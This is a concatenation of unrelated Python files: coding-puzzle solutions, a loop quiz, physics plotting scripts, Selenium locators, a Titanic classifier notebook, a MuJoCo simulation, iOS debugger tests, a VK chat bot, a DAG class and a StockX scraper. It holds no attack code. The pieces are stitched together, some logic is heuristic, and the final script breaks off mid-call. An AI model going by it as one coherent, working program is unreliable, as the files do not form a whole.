def queensAttack(n, k, r_q, c_q, obstacles): # 퀸이 공격할 수 있는 위치 count 문제.
# 시간 제약때문에 살짝 까다로움
# obstacles를 list에서 dictionary로 바꿈 -> O(n)으로 조회 가능
dx, dy = [-1, 1, 0, 0, 1, -1, 1, -1], [0, 0, -1, 1, 1, -1, -1, 1] # 방향
count = 0 # 정답
x = r_q - 1 # 위치
y = c_q - 1 # 위치
for idx in range(8): # 모든 방향을 다 조회한다
nx = x + dx[idx]
ny = y + dy[idx]
while (
0 <= nx < n and 0 <= ny < n and obstacles[(nx + 1, ny + 1)] != 1
): # 이 조건에 맞는다면 계속 탐색
count += 1
nx += dx[idx]
ny += dy[idx]
return count
|
for i in range(1, 6):
j = 0
while j < i:
print(j, end=" ")
j += 1
print("")
# Note: end = " " means that print() will put a space after what was printed instead of starting
# a new line.
# What will be the output of the code above?
# 1
# 1 2
# 1 2 3
# 1 2 3 4
# 1 2 3 4 5
# 0
# 0 1
# 0 1 2
# 0 1 2 3
# 0 1 2 3 4
# 1 2 3 4 5
# 1 2 3 4
# 1 2 3
# 1 2
# 1
# 0 1 2 3 4
# 0 1 2 3
# 0 1 2
# 0 1
# 0
# 2.Which of the following will have the identical output as the one above?
for i in range(1, 6):
for j in range(0, i):
print(j, end = " ")
print("")
for i in range(1, 6):
for j in range(0, i + 1):
print(j, end = " ")
print("")
for i in range(1, 6):
for j in range(i, 6):
print(j, end = " ")
print("")
for i in range(1, 6):
for j in range(i + 1, 6):
print(j, end = " ")
print("")
# Which of the following will have the identical output as the one above?
i = 0
while i < 6:
j = 0
while j < i:
print(j, end = " ")
j += 1
i += 1
print("")
i = 0
while i < 6:
j = 0
while j < i:
print(j, end = " ")
j += 1
i += 1
print("")
i = 1
while i < 6:
j = 0
while j < i:
print(j, end = " ")
j += 1
i += 1
print("")
i = 1
while i < 6:
j = 0
while j < i:
print(j, end = " ")
j += 1
i += 1
print("")
|
#import sys
import numpy as np
import argparse
from socket import gethostname
#import streaker_calibration
import h5_storage
import elegant_matrix
import lasing
import config
import gaussfit
import image_and_profile as iap
#import tracking
#import analysis
import myplotstyle as ms
parser = argparse.ArgumentParser()
parser.add_argument('--noshow', action='store_true')
parser.add_argument('--save', type=str)
args = parser.parse_args()
config.fontsize=9
ms.set_fontsizes(config.fontsize)
np.random.seed(0)
elegant_matrix.set_tmp_dir('~/tmp_elegant/')
ms.closeall()
hostname = gethostname()
if hostname == 'desktop':
data_dir2 = '/storage/data_2021-05-19/'
elif hostname == 'pc11292.psi.ch':
data_dir2 = '/sf/data/measurements/2021/05/19/'
elif hostname == 'pubuntu':
data_dir2 = '/mnt/data/data_2021-05-19/'
data_dir1 = data_dir2.replace('19', '18')
sc_file = data_dir1+'2021_05_18-22_11_36_Calibration_SARUN18-UDCP020.h5'
# Full lasing, but saturation
lasing_on_fileF = data_dir1+'2021_05_18-23_42_10_Lasing_True_SARBD02-DSCR050.h5'
lasing_off_fileF = data_dir1+'2021_05_18-23_43_39_Lasing_False_SARBD02-DSCR050.h5'
# Full lasing begin
lasing_off_fileFB = data_dir1+'2021_05_18-21_02_13_Lasing_False_SARBD02-DSCR050.h5'
lasing_on_fileFB = data_dir1+'2021_05_18-20_52_52_Lasing_True_SARBD02-DSCR050.h5'
# Short pulse begin
lasing_on_fileSB = data_dir1+'2021_05_18-21_08_24_Lasing_True_SARBD02-DSCR050.h5'
lasing_off_fileSB = data_dir1+'2021_05_18-21_06_46_Lasing_False_SARBD02-DSCR050.h5'
# Short pulse
lasing_on_fileS = data_dir1+'2021_05_18-23_47_11_Lasing_True_SARBD02-DSCR050.h5'
lasing_off_fileS = data_dir1+'2021_05_18-23_48_12_Lasing_False_SARBD02-DSCR050.h5'
#Two color pulse I=3 A, k=2
lasing_on_file2 = data_dir1+'2021_05_18-21_41_35_Lasing_True_SARBD02-DSCR050.h5'
lasing_off_file2 = data_dir1+'2021_05_18-21_45_00_Lasing_False_SARBD02-DSCR050.h5'
blmeas_file = data_dir1+'119325494_bunch_length_meas.h5'
screen_x00 = 4250e-6
screen_x02 = 898.02e-6
streaker_offset0 = 374e-6
streaker_offset2 = 364e-6
main_fig = ms.figure('Main lasing', figsize=(13, 7.68))
hspace, wspace = 0.35, 0.3
ms.plt.subplots_adjust(hspace=hspace, wspace=wspace)
subplot = ms.subplot_factory(3, 3, grid=False)
sp_ctr = 1
rec_ctr = 2
norm_factor = None
for ctr, (lasing_on_file, lasing_off_file, pulse_energy, screen_x0, streaker_offset, curr_lim, main_title) in enumerate([
(lasing_on_fileFB, lasing_off_fileFB, 625e-6, screen_x02, streaker_offset2, 1.3e3, '(a) Standard mode'),
(lasing_on_file2, lasing_off_file2, 180e-6, screen_x02, streaker_offset2, 1.5e3, '(b) Double pulse'),
(lasing_on_fileSB, lasing_off_fileSB, 85e-6, screen_x02, streaker_offset2, 1.8e3, '(c) Short pulse'),
]):
lasing_off_dict = h5_storage.loadH5Recursive(lasing_off_file)
lasing_on_dict = h5_storage.loadH5Recursive(lasing_on_file)
n_streaker = 1
beamline = 'Aramis'
delta_gap = -57e-6
tracker_kwargs = config.get_default_tracker_settings()
recon_kwargs = config.get_default_gauss_recon_settings()
slice_factor = 3
charge = 180e-12
subtract_median = False
n_shots = 5
recon_kwargs['charge'] = charge
streaker = config.streaker_names['Aramis'][n_streaker]
print('Streaker offset on/off: %.3f / %.3f mm ' % (lasing_on_dict['meta_data_begin'][streaker+':CENTER'], lasing_off_dict['meta_data_begin'][streaker+':CENTER']))
las_rec_images = {}
for main_ctr, (data_dict, title) in enumerate([(lasing_off_dict, 'Lasing Off'), (lasing_on_dict, 'Lasing On')]):
rec_obj = lasing.LasingReconstructionImages(screen_x0, beamline, n_streaker, streaker_offset, delta_gap, tracker_kwargs, recon_kwargs=recon_kwargs, charge=charge, subtract_median=subtract_median, slice_factor=slice_factor)
#if ctr == rec_ctr:
# rec_obj.do_recon_plot = True
rec_obj.add_dict(data_dict)
if main_ctr == 1:
rec_obj.profile = las_rec_images['Lasing Off'].profile
rec_obj.ref_slice_dict = las_rec_images['Lasing Off'].ref_slice_dict
rec_obj.ref_y = np.mean(las_rec_images['Lasing Off'].ref_y_list)
rec_obj.process_data()
avg_distance = rec_obj.gap/2. - abs(rec_obj.beam_offsets.mean())
print('Average distances (um)', (avg_distance*1e6))
las_rec_images[title] = rec_obj
#rec_obj.plot_images('raw', title)
#rec_obj.plot_images('tE', title)
las_rec = lasing.LasingReconstruction(las_rec_images['Lasing Off'], las_rec_images['Lasing On'], pulse_energy, current_cutoff=curr_lim, norm_factor=norm_factor)
las_rec.plot(n_shots=n_shots)
if ctr == 0:
norm_factor = las_rec.norm_factor
if ctr == rec_ctr:
lasing_off_dict_fb = lasing_off_dict
las_rec_fb = las_rec
rec_obj_fb = las_rec_images['Lasing Off']
ms.plt.figure(main_fig.number)
title = main_title + ' ($E$=%i $\mu$J, $d$=%i $\mu$m)' % (round(las_rec.lasing_dict['Espread']['energy']*1e6), round(avg_distance*1e6))
sp_off = subplot(ctr+1, xlabel='t (fs)', ylabel='E (MeV)', grid=False)
sp_off.set_title(title, loc='left')
sp_on = subplot(ctr+4, xlabel='t (fs)', ylabel='E (MeV)', grid=False)
sp_on.set_title('(%s)' % 'def'[ctr], loc='left')
sp_espread = subplot(ctr+7, xlabel='t (fs)', ylabel='P (GW)')
sp_espread.set_title('(%s)' % 'ghi'[ctr], loc='left')
sp_dummy = lasing.dummy_plot()
plot_handles = (sp_dummy, sp_dummy, sp_dummy, sp_dummy, sp_dummy, sp_dummy, sp_dummy, sp_espread, sp_dummy)
las_rec.plot(plot_handles=plot_handles, n_shots=n_shots)
#sp_espread.get_legend().remove()
if ctr == 0:
espread_ylim = [-2, sp_espread.get_ylim()[1]]
sp_espread.set_ylim(*espread_ylim)
for key, sp in [('Lasing On', sp_on), ('Lasing Off', sp_off)]:
rec_obj = las_rec_images[key]
image_tE = rec_obj.images_tE[0]
rec_obj.slice_factor = 6
rec_obj.slice_x()
rec_obj.fit_slice()
slice_dict = rec_obj.slice_dicts[0]
#rec_obj.images_sliced[0].fit_slice(debug=True)
image_tE.plot_img_and_proj(sp, plot_gauss=False, ylim=[-30e6, 25e6], slice_dict=slice_dict, slice_cutoff=curr_lim)
if ctr == 0:
gf_lims = []
xx = las_rec.lasing_dict['Espread']['time']
yy = las_rec.lasing_dict['Espread']['power']
power_profile = iap.AnyProfile(xx, yy)
print('Rms duration %.1f fs' % (power_profile.rms()*1e15))
print('FWHM duration %.1f fs' % (power_profile.fwhm()*1e15))
elif ctr == 1:
gf_lims = ([30e-15, 45e-15], [60e-15, 80e-15])
elif ctr == 2:
gf_lims = ([40e-15, 55e-15],)
for gf_ctr, gf_lim in enumerate(gf_lims):
if gf_ctr == 0:
ms.figure('Gf %s' % main_title)
gf_sp_ctr = 1
sp = subplot(gf_sp_ctr, xlabel='t (fs)', ylabel='P (GW)')
gf_sp_ctr += 1
xx = las_rec.lasing_dict['Espread']['time']
yy = las_rec.lasing_dict['Espread']['power']
mask = np.logical_and(xx > gf_lim[0], xx < gf_lim[1])
gf = gaussfit.GaussFit(xx[mask], yy[mask])
gf.plot_data_and_fit(sp)
sp.set_title('Gaussfit %i $\sigma$ %.1f fs m %.1f fs' % (gf_ctr, (gf.sigma*1e15), gf.mean*1e15))
print('Gaussian duration %.1f fs' % (gf.sigma*1e15))
print('Gaussian mean %.1f fs' % (gf.mean*1e15))
#sp_espread.plot(gf.xx*1e15, gf.reconstruction/1e9, label='%.1f' % (gf.sigma*1e15), color='red', lw=3)
#if gf_lims:
# sp_espread.legend(title='$\sigma$ (fs)')
if not args.noshow:
ms.show()
if args.save:
ms.saveall(args.save, hspace, wspace, ending='.pdf')
|
from selenium.webdriver.common.by import By
class DashboardPageLocators(object):
STATISTIC_HEADER = (By.XPATH, '//h3[1]')
INTERCOM_IFRAME = (By.XPATH, '//iframe[@class="intercom-launcher-frame"]')
INTERCOM_OPEN_CHAT_BUTTON = (By.CLASS_NAME, 'intercom-avatar')
INTERCOM_CHAT = (By.CLASS_NAME, 'intercom-conversations')
CURRENCY_SYMBOL = (By.XPATH, '//sup')
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
import sys
from PyQt4.QtGui import *
# Create an PyQT4 application object.
a = QApplication(sys.argv)
# The QWidget widget is the base class of all user interface objects in PyQt4.
w = QWidget()
# Set window size.
w.resize(320, 240)
# Set window title
w.setWindowTitle("Hello World!")
# Show window
w.show()
sys.exit(a.exec_())
|
#!/usr/bin/env python
# coding: utf-8
# # Importing modules
# __________________
# The modules involves Numpy, Pandas, Matplotlib, Seaborn
# In[ ]:
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import seaborn as sns #Visualizations
from matplotlib import pyplot as plt
get_ipython().magic(u'matplotlib inline')
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory
from subprocess import check_output
print(check_output(["ls", "../input"]).decode("utf8"))
# Any results you write to the current directory are saved as output.
# # Spliting values in variables
# In[ ]:
train_data = pd.read_csv("../input/train.csv")
test_data = pd.read_csv("../input/test.csv")
files_listing = test_data.PassengerId
test_labels = pd.read_csv('../input/gender_submission.csv')
# # Printing the training data
# In[ ]:
train_data.head()
# # Striping down the data
# ---
# The data contains a lot of useless information. The columns containing these data will need to be dropped.
# Classifiers do not take non integral values as input and so needs to be converted. So Sex column in manipulated
# In[ ]:
labels_test = test_labels.values
labels_test = labels_test[:,1]
test_data = test_data.drop(['Name','SibSp','Parch','Ticket','Fare','Cabin','Embarked'], axis=1)
test_data.Age = test_data.Age.fillna(np.mean(train_data.Age))
test_data.Sex = test_data.Sex.apply(lambda x: 1 if x=='male' else 0)
test_data = test_data.values
test_data = test_data[:,1:]
features_test = test_data
# In[ ]:
train_data = train_data.drop(['Name','SibSp','Parch','Ticket','Fare','Cabin','Embarked'], axis=1)
# In[ ]:
train_data['Age'] = train_data['Age'].fillna(np.mean(train_data.Age))
train_data['Sex'] = train_data['Sex'].apply(lambda x: 1 if x == 'male' else 0)
train_data.head()
# Converting data from dataframe into numpy array and segragating features and labels.
# In[ ]:
#Getting all the values from the dataframe to the numpy array
features_all = train_data.values
#Droping the Passenger Id Column and changing spilting the features and labels
labels_all = features_all[:,1]
features_all = features_all[:,2:]
# # Showdown of Classifiers
# All the algorithms are tested and the accuracy score is generated
# In[ ]:
from sklearn.metrics import accuracy_score
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC, LinearSVC, NuSVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier, GradientBoostingClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
classifiers = [
KNeighborsClassifier(),
AdaBoostClassifier(),
RandomForestClassifier(),
GaussianNB(),
LinearDiscriminantAnalysis(),
GradientBoostingClassifier(),
DecisionTreeClassifier()
]
uni, cnt = np.unique(labels_test, return_counts=True)
res_cols = ['Name','Accuracy']
result = pd.DataFrame(columns=res_cols)
print("Actual Value of the result ",dict(zip(uni, cnt)))
for clf in classifiers:
clf.fit(features_all, labels_all)
print("-"*50)
name=clf.__class__.__name__
print(name)
pred_train = clf.predict(features_test)
acc = accuracy_score(labels_test, pred_train)
print("Result ->", acc*100,'%')
frame = pd.DataFrame([[name, acc*100]],columns=res_cols)
result = result.append(frame)
print('-'*50)
# # Showdown of SVM's
# All the SVM are tuned with different kernel and C parameter tuning and the accuracy is generated
# In[ ]:
classifiers = [
LinearSVC(),
NuSVC(),
SVC(kernel="rbf",C=0.25),
SVC(kernel="linear",C=0.25),
SVC(kernel="rbf",C=1),
SVC(kernel="linear",C=1),
SVC(kernel="rbf",C=5),
SVC(kernel="linear",C=5)
]
uni, cnt = np.unique(labels_test, return_counts=True)
print("Actual Value of the result ",dict(zip(uni, cnt)))
for clf in classifiers:
clf.fit(features_all, labels_all)
print("-"*50)
name = clf.__class__.__name__
print(name)
pred_train = clf.predict(features_test)
acc = accuracy_score(labels_test, pred_train)
print("Result ->", acc*100,'%')
print('-'*50)
# # Comparision plot for Algorithms
# In[ ]:
sns.set_color_codes("muted")
sns.barplot(x='Accuracy', y="Name", data=result,color='g')
plt.xlabel("Accuracy")
plt.ylabel("Classifier Name")
plt.title("Accuracy Graph")
plt.show()
# In[ ]:
# In[ ]:
|
import sys
def print_chess_board(board):
for x in board[::-1]:
for y in x:
sys.stdout.write(y)
sys.stdout.write("\n")
def calculate_next_move(distance_to_end):
# One move to finish!
if(distance_to_end[0] == 2 and distance_to_end[1] == 1):
return (2, 1)
elif(distance_to_end[0] == 1 and distance_to_end[1] == 2):
return (1, 2)
if(distance_to_end[0] == 2 and distance_to_end[1] == -1):
return (2, -1)
elif(distance_to_end[0] == 1 and distance_to_end[1] == -2):
return (1, -2)
elif(distance_to_end[0] == -2 and distance_to_end[1] == 1):
return (-2, 1)
elif(distance_to_end[0] == -1 and distance_to_end[1] == 2):
return (-1, 2)
elif(distance_to_end[0] == -2 and distance_to_end[1] == -1):
return (-2, -1)
elif(distance_to_end[0] == -1 and distance_to_end[1] == -2):
return (-1, -2)
# Two moves to finish!
elif(distance_to_end[0] == 0 and distance_to_end[1] == -2):
return(2, -1)
elif(distance_to_end[0] == 0 and distance_to_end[1] == 2):
return(2, 1)
elif(distance_to_end[0] == -2 and distance_to_end[1] == 0):
return(-1, 2)
elif(distance_to_end[0] == 2 and distance_to_end[1] == 0):
return(1, 2)
elif(distance_to_end[0] == 1 and distance_to_end[1] == 1):
return(2, -1)
elif(distance_to_end[0] == -1 and distance_to_end[1] == 1):
return(-2, -1)
elif(distance_to_end[0] == -1 and distance_to_end[1] == -1):
return(1, -2)
elif(distance_to_end[0] == 1 and distance_to_end[1] == -1):
return(2, 1)
# Three moves to finish!
elif(distance_to_end[0] == 0 and distance_to_end[1] == 1):
return(2, 1)
elif(distance_to_end[0] == 0 and distance_to_end[1] == -1):
return(2, -1)
elif(distance_to_end[0] == 1 and distance_to_end[1] == 0):
return(1, 2)
elif(distance_to_end[0] == -1 and distance_to_end[1] == 0):
return(-1, 2)
# Other garbage
elif(distance_to_end[0] > 2):
return (2, 1)
elif(distance_to_end[0] < -2):
return (-2, 1)
else:
return (0, 0)
def move_knight(current_position, move):
return tuple(sum(t) for t in zip(current_position, move))
def knights_attack(start, end, obstacles):
knight_pos = start
distance_to_end = tuple(t[1] - t[0] for t in zip(knight_pos, end))
chess_board = [["[ ]" for y in range(8)] for x in range(8)]
chess_board[knight_pos[0]][knight_pos[1]] = "[♘]"
chess_board[end[0]][end[1]] = "[👑]"
print_chess_board(chess_board)
move_num = 0
while distance_to_end != (0, 0) and move_num < 20:
move_num += 1
print(f"\n Move {move_num}")
chess_board[knight_pos[0]][knight_pos[1]] = "[ ]"
knight_pos = move_knight(knight_pos, calculate_next_move(distance_to_end))
chess_board[knight_pos[0]][knight_pos[1]] = "[♘]"
distance_to_end = tuple(t[1] - t[0] for t in zip(knight_pos, end))
print_chess_board(chess_board)
print("\n Done!")
knights_attack((1,1), (1,2), []) |
#! /usr/bin/python3
import unittest
from math import sqrt
def factorpairs(n):
if n==1:
return [2]
ff=[]
s=int(sqrt(n))
if s*s==n:
ff.append(s*2)
s-=1
for pf in range(2,s+1):
if n % pf == 0:
ff.append(pf+int(n/pf))
ff.append(n+1)
return ff
def is_stealthy(n):
p=factorpairs(n)
if len(p)==1:
return False
for ix in range(len(p)-1):
for iy in range(ix+1,len(p)):
if abs(p[ix]-p[iy])==1:
return True
return False
class TestIs_Stealthy(unittest.TestCase):
def test_ex1(self):
self.assertEqual(is_stealthy(36),True,'example 1')
def test_ex2(self):
self.assertEqual(is_stealthy(12),True,'example 2')
def test_ex3(self):
self.assertEqual(is_stealthy(6),False,'example 3')
unittest.main()
|
#!/usr/bin/env python3
from mujoco_py import load_model_from_path, MjSim, MjViewer
import numpy as np
import os
import plotly.graph_objs as go
from plotly.offline import plot
from pymuscle.hill_type import (
contractile_element_force_length_curve as ce_length_curve,
contractile_element_force_velocity_curve as ce_velocity_curve,
)
from os.path import dirname
path = dirname(os.path.abspath(__file__)) + "/assets/ballonstring.xml"
model = load_model_from_path(path)
sim = MjSim(model)
viewer = MjViewer(sim)
t = 0
total_steps = 15000
inc = 5.0 / total_steps
time_step = 0.002
forces = []
sensor_forces = []
lengths = []
act_forces = []
initial_stiffness = None
total_forces = []
prev_length = None
for i in range(1, total_steps + 1):
sim.step()
if i == 1:
print("Rest Length", sim.model.tendon_lengthspring)
# sim.model.tendon_lengthspring[0] = sim.model.tendon_lengthspring[0] * 0.65
# import pdb
# pdb.set_trace()
if not initial_stiffness:
initial_stiffness = sim.model.tendon_stiffness[0]
# sim.model.tendon_stiffness[0] = sim.model.tendon_stiffness[0] + 10.0
# sim.model.body_mass[2] = sim.model.body_mass[2] + 0.1
# print("Lengths", sim.data.ten_length)
cur_length = sim.data.ten_length[0]
# print("Rest Length", sim.model.tendon_lengthspring)
rest_length = sim.model.tendon_lengthspring[0]
# print("Stiffness", sim.model.tendon_stiffness)
cur_stiffness = sim.model.tendon_stiffness[0]
tension = 0
# Hooke's Law
if cur_length > rest_length:
delta = cur_length - rest_length
frac = cur_length / rest_length
tension = delta * cur_stiffness
sim.model.tendon_stiffness[0] = initial_stiffness * frac
# print("Tension", tension)
# print("Sensor 1", sim.data.sensordata[:3])
# print("Sensor 1 mag", sensor_force)
# print("Sensor 2", sim.data.sensordata[3:])
# print("Sensor 2 mag", np.linalg.norm(sim.data.sensordata[3:]))
# sim.data.ctrl[0] = sim.data.ctrl[0] - 0.001
# if i > 6000:
# sim.data.ctrl[0] = 0.0
if i > 3000:
length_factor = ce_length_curve(rest_length, cur_length)
if not prev_length:
prev_length = cur_length
velocity_factor = ce_velocity_curve(
rest_length,
cur_length,
prev_length,
time_step
)
sim.data.ctrl[0] = -(length_factor * velocity_factor)
forces.append(tension)
norm_length = cur_length / rest_length
lengths.append(norm_length)
act_force = np.abs(sim.data.actuator_force[0])
act_forces.append(act_force)
sensor_force = np.linalg.norm(sim.data.sensordata[:3])
sensor_forces.append(sensor_force)
total_force = act_force + tension
total_forces.append(total_force)
prev_length = cur_length
if 6000 < i < 9000:
sim.model.body_mass[2] = sim.model.body_mass[2] + 0.1
if i > 9000:
if sim.model.body_mass[2] > 1:
sim.model.body_mass[2] = sim.model.body_mass[2] - 0.1
# print(sim.data.ctrl[0])
# left_val = (math.sin(i / 400) * 2.5) - 2.5
# sim.data.ctrl[0] = left_val
# print(sim.data.qfrc_passive)
# right_val = (math.sin(math.pi + i / 1000) * 2.5) - 2.5
# sim.data.ctrl[1] = right_val
viewer.render()
# fig = go.Figure(
# data=[
# go.Scatter(
# y=forces
# ),
# go.Scatter(
# y=sensor_forces
# )
# ],
# layout=go.Layout(
# title='Calculated tension over time'
# )
# )
# plot(fig, filename='total-force-by-excitation.html')
# fig = go.Figure(
# data=[
# go.Scatter(
# y=lengths
# )
# ],
# layout=go.Layout(
# title='Tendon Length by Time'
# )
# )
# plot(fig, filename='length-by-time.html')
fig = go.Figure(
data=[
go.Scatter(
y=forces,
x=lengths
),
go.Scatter(
y=act_forces,
x=lengths
),
go.Scatter(
y=total_forces,
x=lengths
),
],
layout=go.Layout(
title='Tension by Length',
xaxis=dict(
range=[0.0, 1.8]
)
)
)
plot(fig, filename='tension-by-length.html')
|
from datetime import datetime, timezone
import pytest
from hilda.exceptions import ConvertingFromNSObjectError
@pytest.mark.parametrize('source', [
'',
'3123123',
'asdsdasd',
'12312sadasd',
'The quick brown fox jumps over the lazy frog123',
])
def test_cfstr(hilda_client, source: str):
"""
:param hilda.hilda_client.HildaClient hilda_client: Hilda client.
:param source: CFSTR to be converted to Python string.
"""
cfstr = hilda_client.evaluate_expression(f'@"{source}"')
assert cfstr
assert hilda_client.from_ns(cfstr) == source
def test_ns_data(hilda_client):
"""
:param hilda.hilda_client.HildaClient hilda_client: Hilda client.
"""
data = b'\x01\x00asdasd\xff\xfe58'
with hilda_client.safe_malloc(len(data)) as buffer:
buffer.write(data)
ns_data = hilda_client.evaluate_expression(f'[NSData dataWithBytes:(char *)0x{buffer:x} length:{len(data)}]')
assert hilda_client.from_ns(ns_data) == data
def test_ns_data_in_dict(hilda_client):
"""
:param hilda.hilda_client.HildaClient hilda_client: Hilda client.
"""
data = b'\x01\x00asdasd\xff\xfe58'
with hilda_client.safe_malloc(len(data)) as buffer:
buffer.write(data)
ns_dict = hilda_client.evaluate_expression(
f'@{{"a": [NSData dataWithBytes:(char *)0x{buffer:x} length:{len(data)}]}}'
)
assert hilda_client.from_ns(ns_dict) == {"a": data}
def test_ns_data_in_array(hilda_client):
"""
:param hilda.hilda_client.HildaClient hilda_client: Hilda client.
"""
data = b'\x01\x00asdasd\xff\xfe58'
with hilda_client.safe_malloc(len(data)) as buffer:
buffer.write(data)
ns_dict = hilda_client.evaluate_expression(
f'@[[NSData dataWithBytes:(char *)0x{buffer:x} length:{len(data)}]]'
)
assert hilda_client.from_ns(ns_dict) == [data]
@pytest.mark.parametrize('day, month, year', [(1, 1, 1970), (11, 10, 2021)])
def test_ns_date(hilda_client, day: int, month: int, year: int):
"""
:param hilda.hilda_client.HildaClient hilda_client: Hilda client.
:param day: Date day.
:param month: Date month.
:param year: Date year.
"""
date = hilda_client.evaluate_expression(f'''
NSDateComponents *comps = [NSDateComponents new];
[comps setDay:{day}];
[comps setMonth:{month}];
[comps setYear:{year}];
[comps setTimeZone:[NSTimeZone timeZoneWithAbbreviation:@"UTC"]];
[[NSCalendar currentCalendar] dateFromComponents:comps];
''')
assert hilda_client.from_ns(date) == datetime(day=day, month=month, year=year, tzinfo=timezone.utc)
@pytest.mark.parametrize('source, result', [
# Dictionaries
('@{1:1,234234:"asdasd","a":@[0,0],"asdasd":234234}', {'asdasd': 234234, 234234: 'asdasd', 1: 1, 'a': [0, 0]}),
('@{}', {}),
('@{"asdasds":324234}', {'asdasds': 324234}),
('@{[NSNull null]:324234}', {None: 324234}),
('@{@{"a":1}:324234}', {(("a", 1),): 324234}),
('@{@["a",1]:324234}', {("a", 1): 324234}),
('@{1:@{2:@{3:"a"}}}', {1: {2: {3: 'a'}}}),
# Arrays
('@["asdasd",234234,1,1,@{"a":0}]', ['asdasd', 234234, 1, 1, {'a': 0}]),
('@[]', []),
('@["asdasds",324234]', ['asdasds', 324234]),
('@[1,@[2,@[3,"a"]]]', [1, [2, [3, 'a']]]),
# Sets
('[NSSet setWithArray: @[@"1", @42]]', ['1', 42])
])
def test_ns_nested_objects(hilda_client, source: str, result):
"""
:param hilda.hilda_client.HildaClient hilda_client: Hilda client.
:param source: NS object expression to be converted to Python object.
:param result: Python object.
"""
ns_object = hilda_client.evaluate_expression(source)
assert ns_object
assert hilda_client.from_ns(ns_object) == result
def test_ns_none(hilda_client):
"""
:param hilda.hilda_client.HildaClient hilda_client: Hilda client.
"""
ns_object = hilda_client.evaluate_expression('[NSNull null]')
assert hilda_client.from_ns(ns_object) is None
@pytest.mark.parametrize('source', [0, 1, -1, 1.5, -1.5, 0xfffffffffffffffffff, -0xfffffffffffffffffff, 1 / 3])
def test_ns_number(hilda_client, source):
"""
:param hilda.hilda_client.HildaClient hilda_client: Hilda client.
:param source: Number to convert from NS object.
"""
ns_number = hilda_client.evaluate_expression(f'[NSDecimalNumber decimalNumberWithString:@"{source}"]')
assert hilda_client.from_ns(ns_number) == source
@pytest.mark.parametrize('source', [
'[NSObject new]',
'0x33',
])
def test_error_converting_from_ns(hilda_client, source):
"""
:param hilda.hilda_client.HildaClient hilda_client: Hilda client.
:param source: Expression to convert to python object.
"""
with pytest.raises(ConvertingFromNSObjectError):
hilda_client.from_ns(hilda_client.evaluate_expression(source))
|
from database import get_connection
class vkBot:
def __init__(self, user_id):
self.user_id = user_id
self.commands = ['расписание']
self.hello_message = ['привет', 'здравствуйте', 'приветствую']
self.goodbye_message = ['пока', 'удачи', 'увидимся', 'спасибо']
def new_msg(self, message):
if message.lower() in self.hello_message:
return "Привет, меня зовут Планктон\n Напиши номер своей группы и получишь расписание\n Например '8391'"
elif message.lower() in self.goodbye_message:
return "Успехов тебе!"
else:
try:
msg = int(message)
info = get_connection(msg)
return info
except:
return 'Что-то я тебя не понимаю\nПопробуй еще раз :-)'
|
""" Fast, compact DAG for analyzing expression dependencies
:Author: Arthur Goldberg <Arthur.Goldberg@mssm.edu>
:Date: 2020-07-08
:Copyright: 2020, Karr Lab
:License: MIT
"""
class DAG(object):
""" Fast, compact DAG for analyzing expression dependencies
`networkx` is not usable because its traversal methods use too much RAM.
`DAG` represents a DAG as an adjacency list in a Python `dict`.
"""
def __init__(self):
self.dag = {}
def add_node(self, node):
""" Add a node
"""
if node in self.dag:
raise ValueError('node in self.dag')
self.dag[node] = set()
def rm_node(self, node):
""" Remove a node
"""
if node not in self.dag:
raise ValueError('node not in self.dag')
del self.dag[node]
def nodes(self):
""" Get the nodes
"""
return self.dag.keys()
def add_edge(self, source, dest):
""" Add an edge
"""
if source not in self.dag:
self.add_node(source)
self.dag[source].add(dest)
def rm_edge(self, source, dest):
""" Remove an edge
"""
if source not in self.dag:
raise ValueError('source not in self.dag')
self.dag[source].discard(dest)
def edges(self):
""" Provide all edges
"""
edges = []
for src, dests in self.dag.items():
edges.extend([(src, d) for d in dests])
return edges
def dfs(self, source):
""" Generate a depth-first search
"""
if source not in self.dag:
yield source
else:
visited = set()
visited.add(source)
to_visit = list() # a list of iterators over nodes
to_visit.append(self.dag[source])
yield source
while to_visit:
nodes = to_visit.pop()
for node in nodes:
if node not in visited:
yield node
visited.add(node)
if node in self.dag:
to_visit.append(self.dag[node])
|
from urllib.request import Request, urlopen
from bs4 import BeautifulSoup as soup
from time import sleep
from Stockx.StockxClothing import ClothItem
from Stockx.StockxShoe import ShoeItem
from pymongo import *
def read_page(item):
for link in item:
request = Request(link, headers={'User-Agent': 'Mozilla/5.0'})
page = urlopen(request).read()
parsed = soup(page, 'html.parser')
return parsed
def extract_data(item):
new =[]
values = []
new.append(item.findAll("div", {"class": "sale-value"}))
details = item.findAll("div", {"class": "detail"})
items = str(details).split('<div class="detail">')
for y in new:
newCost = str(y)[26:]
arr = newCost.split("<")
values.append(arr[0])
for x in range(len(items)):
if x == 0:
print(" ")
elif x ==1 or x==2:
values.append(str(items[x])[75:].split(" ")[1])
else:
values.append(str(items[x])[75:].split(" ")[2])
print("####################################################")
print(values)
test = ShoeItem(values[0], values[1], values[2], values[3], values[4])
return test
def search_page(sPage):
new = []
new.append(sPage.findAll("div"))
print(new)
itemlist = []
search = ["https://stockx.com/"]
base = "https://stockx.com/adidas-yeezy-boost-350-v2-"
models = ["static", "static-reflective", "sesame", "cream-white", "semi-frozen-yellow" ,
"white-core-black-red", "butter", "beluga-2-0", "blue-tint", "core-black-red-2017",
"core-black-white", "steeple-grey-beluga-solar-red", "core-black-copper",
"core-black-red", "core-black-green", "oxford-tan",]
for page in models:
new = read_page([base+page])
Newitem = extract_data(new)
itemlist.append(Newitem)
Newitem.simpleCalc()
sleep(3)
print(itemlist)
new = read_page(search)
print(new)
search_page(new)
|
#!/usr/bin/env python
import glob
import pandas
import pandas.io.json
import json
def fix_frame(filename, columns):
frame = pandas.DataFrame.from_csv(filename, index_col=False)
frame.columns = columns
data = frame.to_dict()
for key in data:
data[key] = [data[key][k] for k in data[key]]
json_filename = filename.replace('.csv', '.json')
json_data = json.dumps(data)
with open(json_filename, 'w+') as out:
out.write(json_data)
highfreqs = [f for f in glob.glob('sixify_*_*.csv')]
# print highfreqs
# fix_frame('sixify_aggregation_btcusd.csv',
# ['amount', 'price', 'date'])
for filename in highfreqs:
print filename
fix_frame(filename,
